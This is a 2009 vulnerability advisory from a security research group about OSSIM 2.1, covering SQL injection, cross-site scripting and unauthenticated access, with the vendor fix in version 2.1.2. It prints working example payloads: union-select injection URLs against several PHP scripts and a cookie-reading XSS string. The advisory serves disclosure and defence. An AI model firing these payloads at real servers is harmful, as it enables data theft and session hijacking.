Services Vulnerabilities Exploits Publications News Blog About DSecRG


[DSECRG-09-055] OSSIM 2.1 - Multiple security vulnerabilities

OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.

1. SQL Injections
2. Linked XSS
3. Unauthorized access



Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055


Application: OSSIM
Versions Affected: 2.1 and may be 2.1.1
Vendor URL: http://ossim.net/
Bug: SQL Injection,XSS, Unauthorized access
Exploits: YES
Reported: 07.09.2009
Vendor response: 09.09.2009
Solution: YES (version 2.1.2)
Date of Public Advisory:21.09.2009
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]

Details
*******

1.1 SQL injections in repository

An attacker needs to be authorized in the system for success.

Vulnerable script - repository_document.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3
union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1

1.2 SQL injections in repository

An attacker needs to be authorized in the system for success.

Vulnerable script - repository_links.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3
union select 1,user(),3,4,5,6


1.3 SQL injections in repository

An attacker needs to be authorized in system for success.

Vulnerable script - repository_editdocument.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3
union select 1,user(),3,4,5,6



1.4 SQL injection in policy scripts

An attacker needs to be authorized in the system for success.

Vulnerable script - getpolicy.php
Vulnerable parameter - group


Example
*******

http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1


1.5 SQL injection in policy scripts

An attacker needs to be authorized in the system for success.

Vulnerable script - newhostgroupform.php
Vulnerable parameter - name


Example
*******

http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select
user(),'b','c','d','f


1.6 SQL injection in policy scripts

An attacker needa to be authorized in the system for success.

Vulnerable script - modifynetform.php
Vulnerable parameter - name

Example
*******

http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select
user(),'b','c','d','e','f','g','h','a


And other scripts in policy menu.


2. Linked XSS in main menu

Vulnerable script /ossim/
Vulnerable parameter - option

Example
*******

http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="

3. Access to the data without authentication.

An unauthorized user can see both graphs and infrastructure


Example
*******

Access to the graph:
http://OSSIM-SERVER/ossim/graphs/alarms_events.php

Internal infrastructure view:
http://OSSIM-SERVER/ossim/host/draw_tree.php




Fix Information
***************

Upgrade to version 2.1.2

References
**********
http://www.alienvault.com/community.php?section=News
http://dsecrg.com/pages/vul/show.php?id=155


About
*****

Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com




Vulnerabilities RSS RSS
21.03.2012
[DSECRG-12-019] vCenter Orchestrator - password disclosure

22.02.2012
[DSECRG-12-018] Oracle Application Server - multiple security vulnerabilities

17.02.2012
[DSECRG-12-017] ASUS Net4Switch ipswcom.dll ActiveX - buffer overflow vulnerability

17.02.2012
[DSECRG-12-016] SAP MessagingSystem - information disclosure

17.02.2012
[DSECRG-12-014] SAP Internet Sales - XSS

17.02.2012
[DSECRG-12-015] SAP Adapter Monitor - information disclosure

Vulnerabilities list


© 2002—2014, ERPScan
For quoting or using materials from this site
link is obligatory

+44 (20) 81334493    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search